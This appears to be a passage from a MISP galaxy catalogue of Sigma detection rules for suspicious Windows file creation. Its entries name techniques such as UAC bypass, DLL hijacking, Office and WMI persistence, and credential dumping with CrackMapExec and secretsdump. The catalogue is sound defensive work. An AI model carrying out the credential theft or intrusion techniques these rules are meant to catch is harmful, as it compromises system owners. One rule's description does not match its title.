logsource.product windows
tags ['attack.lateral_movement', 'attack.privilege_escalation', 'attack.execution', 'attack.persistence', 'attack.t1136.002', 'attack.t1543.003', 'attack.t1570', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Suspicious File Creation In Uncommon AppData Folder

Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well-known directories (Local, Roaming, LocalLow). This could be used to bypass detections that exclude the AppData folder for fear of false positives

Internal MISP references

UUID d7b50671-d1ad-4871-aa60-5aa5b331fe04 which can be used as unique global reference for Suspicious File Creation In Uncommon AppData Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Unlikely']
filename file_event_win_new_files_in_uncommon_appdata_folder.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

Suspicious Double Extension Files

Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hides known file extensions by default.

Internal MISP references

UUID b4926b47-a9d7-434c-b3a0-adc3fa0bd13e which can be used as unique global reference for Suspicious Double Extension Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2022/06/19
falsepositive ['Unlikely']
filename file_event_win_susp_double_extension.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.007']
Related clusters

To see the related clusters, click here.

Suspicious Files in Default GPO Folder

Detects the creation or copying of suspicious files (EXE/DLL) into the default GPO storage folder

Internal MISP references

UUID 5f87308a-0a5b-4623-ae15-d8fa1809bc60 which can be used as unique global reference for Suspicious Files in Default GPO Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim
creation_date 2022/04/28
falsepositive ['Unknown']
filename file_event_win_susp_default_gpo_dir_write.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.t1036.005', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Process Explorer Driver Creation By Non-Sysinternals Binary

Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges: they drop it to disk for a few moments, run a service using that driver and remove it afterwards.

Internal MISP references

UUID de46c52b-0bf8-4936-a327-aace94f94ac6 which can be used as unique global reference for Process Explorer Driver Creation By Non-Sysinternals Binary in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/05/05
falsepositive ['Some false positives may occur with legitimate renamed process explorer binaries']
filename file_event_win_sysinternals_procexp_driver_susp_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1068']
Related clusters

To see the related clusters, click here.

Creation Exe for Service with Unquoted Path

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.

Internal MISP references

UUID 8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9 which can be used as unique global reference for Creation Exe for Service with Unquoted Path in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/30
falsepositive ['Unknown']
filename file_event_win_creation_unquoted_service_path.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.009']
Related clusters

To see the related clusters, click here.

GoToAssist Temporary Installation Artefact

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 5d756aee-ad3e-4306-ad95-cb1abec48de2 which can be used as unique global reference for GoToAssist Temporary Installation Artefact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/13
falsepositive ['Legitimate use']
filename file_event_win_gotoopener_artefact.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Potential Remote Credential Dumping Activity

Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.

Internal MISP references

UUID 6e2a900a-ced9-4e4a-a9c2-13e706f9518a which can be used as unique global reference for Potential Remote Credential Dumping Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author SecurityAura
creation_date 2022/11/16
falsepositive ['Unknown']
filename file_event_win_hktl_remote_cred_dump.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Windows Shell/Scripting Application File Write to Suspicious Folder

Detects Windows shells and scripting applications that write files to suspicious folders

Internal MISP references

UUID 1277f594-a7d1-4f28-a2d3-73af5cbeab43 which can be used as unique global reference for Windows Shell/Scripting Application File Write to Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/11/20
falsepositive ['Unknown']
filename file_event_win_shell_write_susp_directory.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

WScript or CScript Dropper - File

Detects a file ending in jse, vbe, js, vba or vbs written by cscript.exe or wscript.exe

Internal MISP references

UUID 002bdb95-0cf1-46a6-9e08-d38c128a6127 which can be used as unique global reference for WScript or CScript Dropper - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Shelton
creation_date 2022/01/10
falsepositive ['Unknown']
filename file_event_win_cscript_wscript_dropper.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Microsoft Office Add-In

Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).

Internal MISP references

UUID 8e1cb247-6cf6-42fa-b440-3f27d57e9936 which can be used as unique global reference for Potential Persistence Via Microsoft Office Add-In in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author NVISO
creation_date 2020/05/11
falsepositive ['Legitimate add-ins']
filename file_event_win_office_addin_persistence.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1137.006']
Related clusters

To see the related clusters, click here.

Remote Access Tool - ScreenConnect Temporary File

Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has a feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.

Internal MISP references

UUID 0afecb6e-6223-4a82-99fb-bf5b981e92a5 which can be used as unique global reference for Remote Access Tool - ScreenConnect Temporary File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ali Alwashali
creation_date 2023/10/10
falsepositive ['Legitimate use of ScreenConnect']
filename file_event_win_remote_access_tools_screenconnect_remote_file.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']

Legitimate Application Dropped Script

Detects programs on a Windows system that should not write scripts to disk

Internal MISP references

UUID 7d604714-e071-49ff-8726-edeb95a70679 which can be used as unique global reference for Legitimate Application Dropped Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022/08/21
falsepositive ['Unknown']
filename file_event_win_susp_legitimate_app_dropping_script.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Uncommon File Created In Office Startup Folder

Detects the creation of a file with an uncommon extension in an Office application startup folder

Internal MISP references

UUID a10a2c40-2c4d-49f8-b557-1a946bc55d9d which can be used as unique global reference for Uncommon File Created In Office Startup Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/05
falsepositive ['False positive might stem from rare extensions used by other Office utilities.']
filename file_event_win_office_uncommon_file_startup.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.resource_development', 'attack.t1587.001']

WinSxS Executable File Creation By Non-System Process

Detects the creation of binaries in the WinSxS folder by non-system processes

Internal MISP references

UUID 34746e8c-5fb8-415a-b135-0abc167e912a which can be used as unique global reference for WinSxS Executable File Creation By Non-System Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/11
falsepositive ['Unknown']
filename file_event_win_susp_winsxs_binary_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.execution']

Potentially Suspicious DMP/HDMP File Creation

Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.

Internal MISP references

UUID aba15bdd-657f-422a-bab3-ac2d2a0d6f1c which can be used as unique global reference for Potentially Suspicious DMP/HDMP File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/07
falsepositive ['Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive.']
filename file_event_win_dump_file_susp_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Executable File Creation

Detects the creation of files with suspicious executable names. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.

Internal MISP references

UUID 74babdd6-a758-4549-9632-26535279e654 which can be used as unique global reference for Suspicious Executable File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/05
falsepositive ['Unknown']
filename file_event_win_susp_executable_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564']

Potential Homoglyph Attack Using Lookalike Characters in Filename

Detects the presence of Unicode characters which are homoglyphs, i.e. identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus make excellent candidates for homoglyph attack characters.

Internal MISP references

UUID 4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6 which can be used as unique global reference for Potential Homoglyph Attack Using Lookalike Characters in Filename in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski, @micahbabinski
creation_date 2023/05/08
falsepositive ['File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use.']
filename file_event_win_susp_homoglyph_filename.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1036.003']

GatherNetworkInfo.VBS Reconnaissance Script Output

Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".

Internal MISP references

UUID f92a6f1e-a512-4a15-9735-da09e78d7273 which can be used as unique global reference for GatherNetworkInfo.VBS Reconnaissance Script Output in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/08
falsepositive ['Unknown']
filename file_event_win_lolbin_gather_network_info_script_output.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.discovery']

LiveKD Kernel Memory Dump File Created

Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.

Internal MISP references

UUID 814ddeca-3d31-4265-8e07-8cc54fb44903 which can be used as unique global reference for LiveKD Kernel Memory Dump File Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/16
falsepositive ['In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary.']
filename file_event_win_sysinternals_livekd_default_dump_name.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation']

Visual Studio Code Tunnel Remote File Creation

Detects the creation of a file by the "node.exe" process in the ".vscode-server" directory. This could be a sign of remote file creation via the VsCode tunnel feature.

Internal MISP references

UUID 56e05d41-ce99-4ecd-912d-93f019ee0b71 which can be used as unique global reference for Visual Studio Code Tunnel Remote File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/25
falsepositive ['Unknown']
filename file_event_win_vscode_tunnel_remote_creation_artefacts.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control']

Potential Persistence Via Outlook Form

Detects the creation of a new Outlook form which can contain malicious code

Internal MISP references

UUID c3edc6a5-d9d4-48d8-930e-aab518390917 which can be used as unique global reference for Potential Persistence Via Outlook Form in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2021/06/10
falsepositive ['Legitimate use of outlook forms']
filename file_event_win_office_outlook_newform.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1137.003']

Malicious DLL File Dropped in the Teams or OneDrive Folder

Detects the creation of a malicious DLL file in the location of the OneDrive or Teams application. Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded.

Internal MISP references

UUID 1908fcc1-1b92-4272-8214-0fbaf2fa5163 which can be used as unique global reference for Malicious DLL File Dropped in the Teams or OneDrive Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/12
falsepositive ['Unknown']
filename file_event_win_iphlpapi_dll_sideloading.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1574.002']

UEFI Persistence Via Wpbbin - FileCreation

Detects the creation of a file named "wpbbin" in the "%systemroot%\system32\" directory, which could be indicative of a UEFI-based persistence method.

Internal MISP references

UUID e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f which can be used as unique global reference for UEFI Persistence Via Wpbbin - FileCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/18
falsepositive ['Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)']
filename file_event_win_wpbbin_persistence.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1542.001']

TeamViewer Remote Session

Detects the creation of log files during a TeamViewer remote session

Internal MISP references

UUID 162ab1e4-6874-4564-853c-53ec3ab8be01 which can be used as unique global reference for TeamViewer Remote Session in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/30
falsepositive ['Legitimate uses of TeamViewer in an organisation']
filename file_event_win_susp_teamviewer_remote_session.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

BloodHound Collection Files

Detects the default file names output by the BloodHound collection tool SharpHound

Internal MISP references

UUID 02773bed-83bf-469f-b7ff-e676e7d78bab which can be used as unique global reference for BloodHound Collection Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author C.J. May
creation_date 2022/08/09
falsepositive ['Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise']
filename file_event_win_bloodhound_collection.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.discovery', 'attack.t1087.001', 'attack.t1087.002', 'attack.t1482', 'attack.t1069.001', 'attack.t1069.002', 'attack.execution', 'attack.t1059.001']

Creation of an WerFault.exe in Unusual Folder

Detects WerFault.exe copied to a suspicious folder, which could be a sign of WerFault DLL hijacking

Internal MISP references

UUID 28a452f3-786c-4fd8-b8f2-bddbe9d616d1 which can be used as unique global reference for Creation of an WerFault.exe in Unusual Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/09
falsepositive ['Unknown']
filename file_event_win_werfault_dll_hijacking.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1574.001']

Octopus Scanner Malware

Detects Octopus Scanner Malware.

Internal MISP references

UUID 805c55d9-31e6-4846-9878-c34c75054fe9 which can be used as unique global reference for Octopus Scanner Malware in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author NVISO
creation_date 2020/06/09
falsepositive ['Unknown']
filename file_event_win_mal_octopus_scanner.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.t1195', 'attack.t1195.001']

Created Files by Microsoft Sync Center

This rule detects suspicious files created by Microsoft Sync Center (mobsync)

Internal MISP references

UUID 409f8a98-4496-4aaa-818a-c931c0a8b832 which can be used as unique global reference for Created Files by Microsoft Sync Center in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim
creation_date 2022/04/28
falsepositive ['Unknown']
filename file_event_win_susp_creation_by_mobsync.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.t1055', 'attack.t1218', 'attack.execution', 'attack.defense_evasion']

Suspicious Binary Writes Via AnyDesk

Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)

Internal MISP references

UUID 2d367498-5112-4ae5-a06a-96e7bc33a211 which can be used as unique global reference for Suspicious Binary Writes Via AnyDesk in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/28
falsepositive ['Unknown']
filename file_event_win_anydesk_writing_susp_binaries.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

Potential RipZip Attack on Startup Folder

Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, the explorer process expands the malicious ZIP file and drops a malicious shortcut, redirected to a backdoor, into the Startup folder. Additionally, the file name of the malicious shortcut in the Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D}, which denotes the folder shortcut operation.

Internal MISP references

UUID a6976974-ea6f-4e97-818e-ea08625c52cb which can be used as unique global reference for Potential RipZip Attack on Startup Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Greg (rule)
creation_date 2022/07/21
falsepositive ['Unknown']
filename file_event_win_ripzip_attack.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547']

Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream

Detects the creation of a hidden file or folder with the "::$index_allocation" stream, which can be used as a technique to prevent access to folders and files from tooling such as "explorer.exe" and "powershell.exe"

Internal MISP references

UUID a8f866e1-bdd4-425e-a27a-37619238d9c7 which can be used as unique global reference for Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Scoubi (@ScoubiMtl)
creation_date 2023/10/09
falsepositive ['Unlikely']
filename file_event_win_susp_hidden_dir_index_allocation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']

Advanced IP Scanner - File Event

Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.

Internal MISP references

UUID fed85bf9-e075-4280-9159-fbe8a023d6fa which can be used as unique global reference for Advanced IP Scanner - File Event in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ROxPinTeddy
creation_date 2020/05/12
falsepositive ['Legitimate administrative use']
filename file_event_win_advanced_ip_scanner.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.discovery', 'attack.t1046']

UAC Bypass Using Windows Media Player - File

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

Internal MISP references

UUID 68578b43-65df-4f81-9a9b-92f32711a951 which can be used as unique global reference for UAC Bypass Using Windows Media Player - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename file_event_win_uac_bypass_wmp.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']

Malicious PowerShell Scripts - FileCreation

Detects the creation of known offensive PowerShell scripts used for exploitation

Internal MISP references

UUID f331aa1f-8c53-4fc3-b083-cc159bc971cb which can be used as unique global reference for Malicious PowerShell Scripts - FileCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein
creation_date 2018/04/07
falsepositive ['Unknown']
filename file_event_win_powershell_exploit_scripts.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Suspicious File Drop by Exchange

Detects suspicious file type dropped by an Exchange component in IIS

Internal MISP references

UUID 6b269392-9eba-40b5-acb6-55c882b20ba6 which can be used as unique global reference for Suspicious File Drop by Exchange in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/10/04
falsepositive ['Unknown']
filename file_event_win_exchange_webshell_drop_suspicious.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1190', 'attack.initial_access', 'attack.t1505.003']

Potential Binary Or Script Dropper Via PowerShell

Detects PowerShell creating a binary executable or a script file.

Internal MISP references

UUID 7047d730-036f-4f40-b9d8-1c63e36d5e62 which can be used as unique global reference for Potential Binary Or Script Dropper Via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/17
falsepositive ['False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.']
filename file_event_win_powershell_drop_binary_or_script.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

CSExec Service File Creation

Detects default CSExec service filename which indicates CSExec service installation and execution

Internal MISP references

UUID f0e2b768-5220-47dd-b891-d57b96fc0ec1 which can be used as unique global reference for CSExec Service File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/04
falsepositive ['Unknown']
filename file_event_win_csexec_service.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']

Suspicious MSExchangeMailboxReplication ASPX Write

Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .aspx files to disk, which could be a sign of ProxyShell exploitation

Internal MISP references

UUID 7280c9f3-a5af-45d0-916a-bc01cb4151c9 which can be used as unique global reference for Suspicious MSExchangeMailboxReplication ASPX Write in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/25
falsepositive ['Unknown']
filename file_event_win_susp_exchange_aspx_write.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.initial_access', 'attack.t1190', 'attack.persistence', 'attack.t1505.003']

Suspicious File Created In PerfLogs

Detects suspicious files, based on their extension, being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files

Internal MISP references

UUID bbb7e38c-0b41-4a11-b306-d2a457b7ac2b which can be used as unique global reference for Suspicious File Created In PerfLogs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/05
falsepositive ['Unlikely']
filename file_event_win_perflogs_susp_files.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059']

PCRE.NET Package Temp Files

Detects processes creating temp files related to PCRE.NET package

Internal MISP references

UUID 6e90ae7a-7cd3-473f-a035-4ebb72d961da which can be used as unique global reference for PCRE.NET Package Temp Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/29
falsepositive ['Unknown']
filename file_event_win_pcre_net_temp_file.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059']

Files With System Process Name In Unsuspected Locations

Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production.

Internal MISP references

UUID d5866ddf-ce8f-4aea-b28e-d96485a20d3d which can be used as unique global reference for Files With System Process Name In Unsuspected Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/05/26
falsepositive ['System processes copied outside their default folders for testing purposes', 'Third party software naming their software with the same names as the processes mentioned here']
filename file_event_win_creation_system_file.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.005']

Cred Dump Tools Dropped Files

Detects the creation of files with well-known filenames (parts of credential dump software or files produced by them)

Internal MISP references

UUID 8fbf3271-1ef6-4e94-8210-03c2317947f6 which can be used as unique global reference for Cred Dump Tools Dropped Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community
creation_date 2019/11/01
falsepositive ['Legitimate Administrator using tool for password recovery']
filename file_event_win_cred_dump_tools_dropped_files.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.t1003.002', 'attack.t1003.003', 'attack.t1003.004', 'attack.t1003.005']

PowerShell Profile Modification

Detects the creation or modification of a PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence

Internal MISP references

UUID b5b78988-486d-4a80-b991-930eff3ff8bf which can be used as unique global reference for PowerShell Profile Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author HieuTT35, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/10/24
falsepositive ['System administrator creating Powershell profile manually']
filename file_event_win_susp_powershell_profile.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.013']

Installation of TeamViewer Desktop

Detects TeamViewer_Desktop.exe being created during installation

Internal MISP references

UUID 9711de76-5d4f-4c50-a94f-21e4e8f8384d which can be used as unique global reference for Installation of TeamViewer Desktop in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/28
falsepositive ['Unknown']
filename file_event_win_install_teamviewer_desktop.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

UAC Bypass Using .NET Code Profiler on MMC

Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)

Internal MISP references

UUID 93a19907-d4f9-4deb-9f91-aac4692776a6 which can be used as unique global reference for UAC Bypass Using .NET Code Profiler on MMC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename file_event_win_uac_bypass_dotnet_profiler.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']

Potential Persistence Via Microsoft Office Startup Folder

Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.

Internal MISP references

UUID 0e20c89d-2264-44ae-8238-aeeaba609ece which can be used as unique global reference for Potential Persistence Via Microsoft Office Startup Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/02
falsepositive ['Loading a user environment from a backup or a domain controller', 'Synchronization of templates']
filename file_event_win_office_startup_persistence.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1137']

RDP File Creation From Suspicious Application

Detects Rclone config file being created

Internal MISP references

UUID fccfb43e-09a7-4bd2-8b37-a5a7df33386d which can be used as unique global reference for RDP File Creation From Suspicious Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/18
falsepositive ['Unknown']
filename file_event_win_rdp_file_susp_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion']

WMI Persistence - Script Event Consumer File Write

Detects file writes of WMI script event consumer

Internal MISP references

UUID 33f41cdd-35ac-4ba8-814b-c6a4244a1ad4 which can be used as unique global reference for WMI Persistence - Script Event Consumer File Write in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2018/03/07
falsepositive ['Dell Power Manager (C:\Program Files\Dell\PowerManager\DpmPowerPlanSetup.exe)']
filename file_event_win_wmi_persistence_script_event_consumer_write.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.t1546.003', 'attack.persistence']

Potential DCOM InternetExplorer.Application DLL Hijack

Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network

Internal MISP references

UUID 2f7979ae-f82b-45af-ac1d-2b10e93b0baa which can be used as unique global reference for Potential DCOM InternetExplorer.Application DLL Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
creation_date 2020/10/12
falsepositive ['Unknown']
filename file_event_win_dcom_iertutil_dll_hijack.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002', 'attack.t1021.003']

Suspicious desktop.ini Action

